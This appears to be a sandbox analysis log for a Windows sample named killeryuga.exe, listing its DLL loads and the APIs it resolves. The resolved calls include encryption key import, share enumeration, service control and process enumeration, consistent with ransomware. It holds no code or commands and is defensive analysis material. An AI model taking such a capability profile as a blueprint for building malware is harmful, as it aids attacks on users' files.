Operation Module Additional Information Success Count Logfile
Load KERNEL32.DLL base_address = 0x75350000 True 1
Fn
Load ADVAPI32.dll base_address = 0x76f50000 True 2
Fn
Load GDI32.dll base_address = 0x76a80000 True 1
Fn
Load ole32.dll base_address = 0x75bd0000 True 2
Fn
Load SHELL32.dll base_address = 0x75e30000 True 2
Fn
Load USER32.dll base_address = 0x75470000 True 2
Fn
Load kernel32.dll base_address = 0x75350000 True 2
Fn
Load RPCRT4.dll base_address = 0x759b0000 True 1
Fn
Load MPR.dll base_address = 0x750d0000 True 1
Fn
Load WININET.dll base_address = 0x75d30000 True 1
Fn
Load WINMM.dll base_address = 0x75090000 True 1
Fn
Load SHLWAPI.dll base_address = 0x77020000 True 1
Fn
Load KERNEL32.dll base_address = 0x75350000 True 1
Fn
Load OLEAUT32.dll base_address = 0x76b50000 True 1
Fn
Load IPHLPAPI.DLL base_address = 0x750f0000 True 1
Fn
Load WS2_32.dll base_address = 0x76b10000 True 1
Fn
Load DNSAPI.dll base_address = 0x75020000 True 1
Fn
Load CRYPT32.dll base_address = 0x751a0000 True 1
Fn
Load msvcr100.dll base_address = 0x74e80000 True 1
Fn
Load Psapi.dll base_address = 0x75460000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75350000 True 15
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 260 True 2
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 1024 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringA, address_out = 0x75363c5a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeZoneInformation, address_out = 0x7536465a True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x7536469b True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x75361410 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x753653c6 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoW, address_out = 0x75363c42 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringW, address_out = 0x75363bca True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesA, address_out = 0x7538287b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoA, address_out = 0x7537d5e5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLCID, address_out = 0x75363da5 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatA, address_out = 0x7538a959 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatA, address_out = 0x7538a842 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x75361946 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeA, address_out = 0x75388266 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFileEx, address_out = 0x753e45ef True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FatalAppExitA, address_out = 0x753e4691 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FillConsoleOutputAttribute, address_out = 0x754071e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x75361245 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetCommMask, address_out = 0x753e7198 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TransmitCommChar, address_out = 0x753e75fe True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = PrepareTape, address_out = 0x753ed232 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x75361222 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x75361700 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVolumePathNameA, address_out = 0x753ebeed True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsBadWritePtr, address_out = 0x7538d1ec True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextVolumeMountPointA, address_out = 0x753ec189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x7536588e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnlockFileEx, address_out = 0x7538d594 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x753634b0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryExA, address_out = 0x753d9479 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedDecrement, address_out = 0x753613f0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteTapemark, address_out = 0x753ed2d2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeW, address_out = 0x7536418b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetNativeSystemInfo, address_out = 0x753710b5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocale, address_out = 0x7537ce46 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalDeleteAtom, address_out = 0x7537cdad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x753617b9 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringA, address_out = 0x7538bc39 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x7536192e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x75387aca True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleOutputCP, address_out = 0x75379b0f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleA, address_out = 0x753612fc True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x753e454f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x75361916 True 2
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x753649d7 True 2
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedExchange, address_out = 0x75361462 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x753634c8 True 2
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleCtrlHandler, address_out = 0x75368a09 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x75364d40 True 2
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x753658a6 True 2
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x7538d1c3 True 2
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x7537d802 True 3
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x75361809 True 2
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x7538772f True 2
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x753687c9 True 2
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x75364a5d True 2
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x775fe026 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x753611c0 True 2
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x753614c9 True 2
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x753610ff True 2
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x75367a10 True 3
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x75361282 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x753651b3 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x753614b1 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x75364950 True 2
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x753651cb True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x753651e3 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x75365223 True 2
Get Address c:\windows\syswow64\kernel32.dll function = SetHandleCount, address_out = 0x7536cb29 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x75363531 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoA, address_out = 0x75360e00 True 1
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x776045f5 True 2
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x753611e0 True 2
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x753649ad True 2
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x753614fb True 2
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x75363587 True 2
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedIncrement, address_out = 0x75361400 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x753611a9 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x75361450 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThread, address_out = 0x753617ec True 2
Get Address c:\windows\syswow64\kernel32.dll function = HeapCreate, address_out = 0x75364a2d True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapDestroy, address_out = 0x753635b7 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x7536186e True 3
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x75361725 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x7536110c True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x753611f8 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x75363509 True 2
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x753617d1 True 2
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x7536170d True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x75407bff True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x75361328 True 2
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x775f22b0 True 2
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x775f2270 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x75365189 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x7536179c True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x7538d1a1 True 2
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x75364493 True 2
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x75361856 True 3
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77611f6e True 2
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77603002 True 2
Get Address c:\windows\syswow64\kernel32.dll function = SetEnvironmentVariableA, address_out = 0x7536e331 True 2
Get Address c:\windows\syswow64\advapi32.dll function = IsValidSecurityDescriptor, address_out = 0x76f5b58c True 1
Get Address c:\windows\syswow64\advapi32.dll function = GetFileSecurityA, address_out = 0x76f919b8 True 1
Get Address c:\windows\syswow64\advapi32.dll function = ImpersonateLoggedOnUser, address_out = 0x76f5c57a True 1
Get Address c:\windows\syswow64\advapi32.dll function = ObjectCloseAuditAlarmW, address_out = 0x76f93389 True 1
Get Address c:\windows\syswow64\advapi32.dll function = CreatePrivateObjectSecurity, address_out = 0x76f79a12 True 1
Get Address c:\windows\syswow64\advapi32.dll function = AreAllAccessesGranted, address_out = 0x76f930a8 True 1
Get Address c:\windows\syswow64\advapi32.dll function = GetAclInformation, address_out = 0x76f5cc89 True 1
Get Address c:\windows\syswow64\advapi32.dll function = AreAnyAccessesGranted, address_out = 0x76f930b8 True 1
Get Address c:\windows\syswow64\gdi32.dll function = SetMetaFileBitsEx, address_out = 0x76aa7121 True 1
Get Address c:\windows\syswow64\gdi32.dll function = CreateDIBPatternBrushPt, address_out = 0x76aab6da True 1
Get Address c:\windows\syswow64\gdi32.dll function = SetWindowExtEx, address_out = 0x76aa1ace True 1
Get Address c:\windows\syswow64\gdi32.dll function = GetMetaFileBitsEx, address_out = 0x76aa6e71 True 1
Get Address c:\windows\syswow64\gdi32.dll function = GetDeviceCaps, address_out = 0x76a94de0 True 1
Get Address c:\windows\syswow64\gdi32.dll function = AngleArc, address_out = 0x76ac4124 True 1
Get Address c:\windows\syswow64\gdi32.dll function = GetDCBrushColor, address_out = 0x76ac232e True 1
Get Address c:\windows\syswow64\gdi32.dll function = FlattenPath, address_out = 0x76ac555d True 1
Get Address c:\windows\syswow64\gdi32.dll function = GetGraphicsMode, address_out = 0x76aa138a True 1
Get Address c:\windows\syswow64\gdi32.dll function = SetDIBits, address_out = 0x76a97590 True 1
Get Address c:\windows\syswow64\gdi32.dll function = CopyEnhMetaFileW, address_out = 0x76acd9dc True 1
Get Address c:\windows\syswow64\gdi32.dll function = Chord, address_out = 0x76ac439f True 1
Get Address c:\windows\syswow64\gdi32.dll function = PlayMetaFile, address_out = 0x76aab2b9 True 1
Get Address c:\windows\syswow64\ole32.dll function = CLSIDFromProgID, address_out = 0x75bf503c True 1
Get Address c:\windows\syswow64\ole32.dll function = OleUninitialize, address_out = 0x75beeba1 True 1
Get Address c:\windows\syswow64\ole32.dll function = OleSetMenuDescriptor, address_out = 0x75c2dc53 True 1
Get Address c:\windows\syswow64\ole32.dll function = OleLoadFromStream, address_out = 0x75bd6143 True 1
Get Address c:\windows\syswow64\ole32.dll function = OleQueryCreateFromData, address_out = 0x75c532d4 True 1
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListA, address_out = 0x75f51c24 True 1
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteW, address_out = 0x75e43c71 True 1
Get Address c:\windows\syswow64\shell32.dll function = SHGetInstanceExplorer, address_out = 0x75e76399 True 1
Get Address c:\windows\syswow64\shell32.dll function = Shell_NotifyIconA, address_out = 0x76078af2 True 1
Get Address c:\windows\syswow64\shell32.dll function = DragAcceptFiles, address_out = 0x75f51bf1 True 1
Get Address c:\windows\syswow64\user32.dll function = SetWindowsHookW, address_out = 0x754c8ca2 True 1
Get Address c:\windows\syswow64\user32.dll function = PostThreadMessageW, address_out = 0x75488bff True 2
Get Address c:\windows\syswow64\user32.dll function = SetMessageQueue, address_out = 0x7549c8e7 True 1
Get Address c:\windows\syswow64\user32.dll function = GetSysColor, address_out = 0x75486c3c True 1
Get Address c:\windows\syswow64\user32.dll function = BroadcastSystemMessageW, address_out = 0x754cc140 True 1
Get Address c:\windows\syswow64\user32.dll function = EndPaint, address_out = 0x75491341 True 2
Get Address c:\windows\syswow64\user32.dll function = OpenDesktopA, address_out = 0x7549011a True 1
Get Address c:\windows\syswow64\user32.dll function = SetCapture, address_out = 0x754aed56 True 1
Get Address c:\windows\syswow64\user32.dll function = MsgWaitForMultipleObjects, address_out = 0x75490b4a True 1
Get Address c:\windows\syswow64\user32.dll function = DefDlgProcW, address_out = 0x77634100 True 1
Get Address c:\windows\syswow64\user32.dll function = DdeUnaccessData, address_out = 0x754d82f4 True 1
Get Address c:\windows\syswow64\user32.dll function = GetClassInfoExW, address_out = 0x7548b238 True 1
Get Address c:\windows\syswow64\user32.dll function = GetScrollBarInfo, address_out = 0x75493ff8 True 1
Get Address c:\windows\syswow64\user32.dll function = CharLowerA, address_out = 0x75493e75 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x75364f2b True 2
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x75361252 True 2
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x75364208 True 2
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x7536359f True 2
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77610fcb True 9
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77609d35 True 4
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x75365235 True 2
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x7538735f True 2
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x753879f9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x7536435f True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x75363519 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x75361b00 True 2
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeA, address_out = 0x759f3fc5 True 1
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringA, address_out = 0x75a2d918 True 1
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringW, address_out = 0x759f1ee5 True 1
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeW, address_out = 0x759d1635 True 1
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidCreate, address_out = 0x759cf48b True 1
Get Address c:\windows\syswow64\mpr.dll function = WNetEnumResourceW, address_out = 0x750d3058 True 1
Get Address c:\windows\syswow64\mpr.dll function = WNetOpenEnumW, address_out = 0x750d2f06 True 1
Get Address c:\windows\syswow64\mpr.dll function = WNetCloseEnum, address_out = 0x750d2dd6 True 1
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x75d4ab49 True 1
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenW, address_out = 0x75d59197 True 1
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlW, address_out = 0x75dabe5c True 1
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x75d4b406 True 1
Get Address c:\windows\syswow64\wininet.dll function = HttpQueryInfoW, address_out = 0x75d55c75 True 1
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlA, address_out = 0x75d730f1 True 1
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenA, address_out = 0x75d5f18e True 1
Get Address c:\windows\syswow64\winmm.dll function = timeGetTime, address_out = 0x750926e0 True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsW, address_out = 0x770345bf True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7705ad1a True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathRemoveFileSpecW, address_out = 0x77033248 True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindFileNameW, address_out = 0x7703bb71 True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindExtensionW, address_out = 0x7703a1b9 True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendA, address_out = 0x7702d65e True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x770381ef True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x75364435 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x75365a4b True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x7536103d True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x7537c807 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryW, address_out = 0x75364259 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x75361136 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalDrives, address_out = 0x75365371 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeA, address_out = 0x7537ef75 True 1
Get Address c:\windows\syswow64\kernel32.dll function = OpenProcess, address_out = 0x75361986 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemDirectoryW, address_out = 0x75365063 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryW, address_out = 0x7536492b True 1
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileW, address_out = 0x7538830d True 1
Get Address c:\windows\syswow64\kernel32.dll function = FormatMessageW, address_out = 0x75364620 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpynW, address_out = 0x7538d556 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x75361072 True 1
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x75363ed3 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x75363f5c True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x75382b7a True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x753633a0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x75365929 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x7538594d True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSizeEx, address_out = 0x753659e2 True 1
Get Address c:\windows\syswow64\kernel32.dll function = MoveFileW, address_out = 0x75379af0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x75388baf True 1
Get Address c:\windows\syswow64\kernel32.dll function = LocalAlloc, address_out = 0x7536168c True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventW, address_out = 0x7536183e True 1
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x7538896c True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x7538828e True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexA, address_out = 0x75364c6b True 1
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileW, address_out = 0x753689b3 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LocalFree, address_out = 0x75362d3c True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x75383102 True 1
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x75365444 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x75382a9d True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetPriorityClass, address_out = 0x7537cf28 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetExitCodeProcess, address_out = 0x7537174d True 1
Get Address c:\windows\syswow64\kernel32.dll function = GlobalFree, address_out = 0x75365558 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetVersion, address_out = 0x75364467 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x753634d5 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryA, address_out = 0x7538d526 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreW, address_out = 0x7537ca5a True 1
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesW, address_out = 0x753e425f True 1
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x7536495d True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatW, address_out = 0x753834d7 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatW, address_out = 0x7537f481 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x75364a6f True 1
Get Address c:\windows\syswow64\kernel32.dll function = OutputDebugStringW, address_out = 0x7538d1d4 True 1
Get Address c:\windows\syswow64\kernel32.dll function = AreFileApisANSI, address_out = 0x753e40d1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x753614e9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x753654ee True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x7536dd0e True 1
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x75488a29 True 1
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x75489a55 True 1
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x754878e2 True 1
Get Address c:\windows\syswow64\user32.dll function = PostQuitMessage, address_out = 0x75489abb True 1
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x754888f7 True 1
Get Address c:\windows\syswow64\user32.dll function = BeginPaint, address_out = 0x75491361 True 1
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x75487809 True 1
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x7548b17d True 1
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x75490dfb True 1
Get Address c:\windows\syswow64\user32.dll function = IsWindow, address_out = 0x75487136 True 1
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x75489679 True 1
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x75493559 True 1
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x776025dd True 1
Get Address c:\windows\syswow64\user32.dll function = MessageBoxA, address_out = 0x754dfd1e True 1
Get Address c:\windows\syswow64\user32.dll function = PeekMessageW, address_out = 0x754905ba True 1
Get Address c:\windows\syswow64\user32.dll function = MessageBoxW, address_out = 0x754dfd3f True 1
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x7548787b True 1
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetHashParam, address_out = 0x76f5df7e True 1
Get Address c:\windows\syswow64\advapi32.dll function = CloseServiceHandle, address_out = 0x76f6369c True 1
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextW, address_out = 0x76f5df14 True 1
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x76f6157a True 1
Get Address c:\windows\syswow64\advapi32.dll function = CryptHashData, address_out = 0x76f5df36 True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x76f614d6 True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x76f6469d True 1
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyHash, address_out = 0x76f5df66 True 1
Get Address c:\windows\syswow64\advapi32.dll function = ControlService, address_out = 0x76f77144 True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x76f6468d True 1
Get Address c:\windows\syswow64\advapi32.dll function = OpenServiceW, address_out = 0x76f5ca4c True 1
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x76f5e124 True 1
Get Address c:\windows\syswow64\advapi32.dll function = CryptCreateHash, address_out = 0x76f5df4e True 1
Get Address c:\windows\syswow64\advapi32.dll function = CryptEncrypt, address_out = 0x76f7779b True 1
Get Address c:\windows\syswow64\advapi32.dll function = CryptImportKey, address_out = 0x76f5c532 True 1
Get Address c:\windows\syswow64\advapi32.dll function = QueryServiceStatus, address_out = 0x76f62a86 True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x76f646ad True 1
Get Address c:\windows\syswow64\advapi32.dll function = OpenSCManagerW, address_out = 0x76f5ca64 True 1
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderLocation, address_out = 0x75ebe141 True 1
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x75e49ee8 True 1
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75e51e46 True 1
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteA, address_out = 0x76077078 True 1
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListW, address_out = 0x75ec17bf True 1
Get Address c:\windows\syswow64\ole32.dll function = CoInitialize, address_out = 0x75beb636 True 1
Get Address c:\windows\syswow64\ole32.dll function = CoInitializeSecurity, address_out = 0x75bf7259 True 1
Get Address c:\windows\syswow64\ole32.dll function = CoUninitialize, address_out = 0x75c186d3 True 1
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstance, address_out = 0x75c19d0b True 1
Get Address c:\windows\syswow64\oleaut32.dll function = 9, address_out = 0x76b53eae True 1
Get Address c:\windows\syswow64\oleaut32.dll function = 8, address_out = 0x76b53ed5 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = 12, address_out = 0x76b55dee True 1
Get Address c:\windows\syswow64\oleaut32.dll function = 201, address_out = 0x76b54af8 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = 6, address_out = 0x76b53e59 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = 200, address_out = 0x76b53f21 True 1
